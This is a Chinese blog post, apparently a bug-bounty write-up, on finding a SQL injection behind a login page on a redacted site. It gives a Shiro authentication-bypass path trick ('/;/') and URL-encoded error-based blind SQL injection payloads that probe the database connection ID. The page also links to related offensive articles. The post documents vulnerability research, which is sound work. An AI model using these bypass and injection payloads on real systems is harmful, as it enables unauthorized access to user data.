记一次SRC的前台 sql 注入漏洞

01648

在信息收集时发现一个登录框

http://xxxxx/login

image

存在前台 sql 注入漏洞

正常访问

http://xxxxxxxx/login/sys/user/list?limit=10&offset=0&username=&deptId=&name=

会跳转到登录页面

image

shiro 权限绕过:

http://xxxxxxxx/;/sys/user/list?limit=10&offset=0&username=&deptId=&name=

image

 

注入 payload 获取数据库连接 id

http://xxxxxx/;/sys/user/list?limit=10&offset=0&username=&deptId=&name=%27%20or%20if(le ft(connection_id(),1)=1,exp(999),1)=%27

image

 

http://xxxxxx/;/sys/user/list?limit=10&offset=0&username=&deptId=&name=%27%20or%20if(le ft(connection_id(),1)=2,exp(999),1)=%27

image

 

© 版权声明
文章版权声明 1、本网站名称:阻击者联盟安全社区
2、本站永久网址:https://blogh-ackercn
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系官方群:1170360789进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向官方群举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。

THE END
未分类
# 漏洞挖掘
喜欢就支持一下吧
点赞8 分享
Phantom的头像-阻击者联盟钻石会员
强网杯青少年专项赛 2024 WriteUp-阻击者联盟
强网杯青少年专项赛 2024 WriteUp
强网杯青少年专项赛 2024 WriteUp
1个月前 388
Exchange邮件系统ProxyShell攻击链复现小记 By 年姐-阻击者联盟
Exchange邮件系统ProxyShell攻击链复现小记 By 年姐
Exchange邮件系统ProxyShell攻击链复现小记 By 年姐
10个月前 232
HVV已公开POC-阻击者联盟
HVV已公开POC
HVV已公开POC
10个月前 148
众测下的SQL注入挖掘-阻击者联盟
众测下的SQL注入挖掘
众测下的SQL注入挖掘
10个月前 136
不常规的xss-阻击者联盟
不常规的xss
不常规的xss
10个月前 108
相关推荐
web渗透基本流程-阻击者联盟
web渗透基本流程
web渗透基本流程
10个月前 318
常用社会工程学技巧-阻击者联盟
常用社会工程学技巧
常用社会工程学技巧
10个月前 260
Exchange邮件系统ProxyShell攻击链复现小记 By 年姐-阻击者联盟
Exchange邮件系统ProxyShell攻击链复现小记 By 年姐
Exchange邮件系统ProxyShell攻击链复现小记 By 年姐
10个月前 232
2024HVV吐槽-阻击者联盟
2024HVV吐槽
2024HVV吐槽
10个月前 208
我仅使用 ChatGPT 提示创建了一个无法检测到的渗透漏洞-阻击者联盟
我仅使用 ChatGPT 提示创建了一个无法检测到的渗透漏洞
我仅使用 ChatGPT 提示创建了一个无法检测到的渗透漏洞
10个月前 194
口算base64-阻击者联盟
口算base64
口算base64
10个月前 193
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片
快捷回复
谢谢你的分享,我从中学到了很多!
教程很好用,谢谢!
好东西,学习一下!
楼主听话,快到碗里来!
路过一下,我只是来打酱油的!
水帖美如花,养护靠大家!

    暂无评论内容